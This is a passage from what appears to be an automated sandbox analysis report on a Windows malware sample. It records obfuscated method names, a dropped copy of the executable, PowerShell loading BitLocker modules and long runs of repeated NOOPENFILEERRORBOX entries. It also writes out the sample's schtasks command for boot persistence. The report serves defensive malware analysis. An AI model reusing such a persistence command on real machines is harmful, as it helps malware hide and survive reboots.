            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, GHFeyxz7mqsCJvdZTI.csHigh entropy of concatenated method names: 'EEkhmUt6DB', 'k2UhbpAXh1', 'xBXhf43vWr', 'jD7hOwvpTZ', 'rsxhstJQXr', 'Th8hQM5OXf', 'Xdthg259p0', 'lfqhuWp9qL', 'p4qh2YcdaT', 'VBmhMLBUyA'
            Source: 0.2.hcy2SdW2z6.exe.49046a8.4.raw.unpack, ytaKslPPxIEyiYcfiW.csHigh entropy of concatenated method names: 'atHi0UotOQ', 'QHMiquXxSV', 'PO5KTMrocl', 'Uh9KQMPgN6', 'c7CKgWqSul', 'tt6Ka8nyIs', 'jp1KFGrlyD', 'qS9KwCfjN9', 'dCdKZBSnXR', 'BJHKyS6Fll'
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile created: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zZlsXaceOG" /XML "C:\Users\user\AppData\Local\Temp\tmpDE83.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
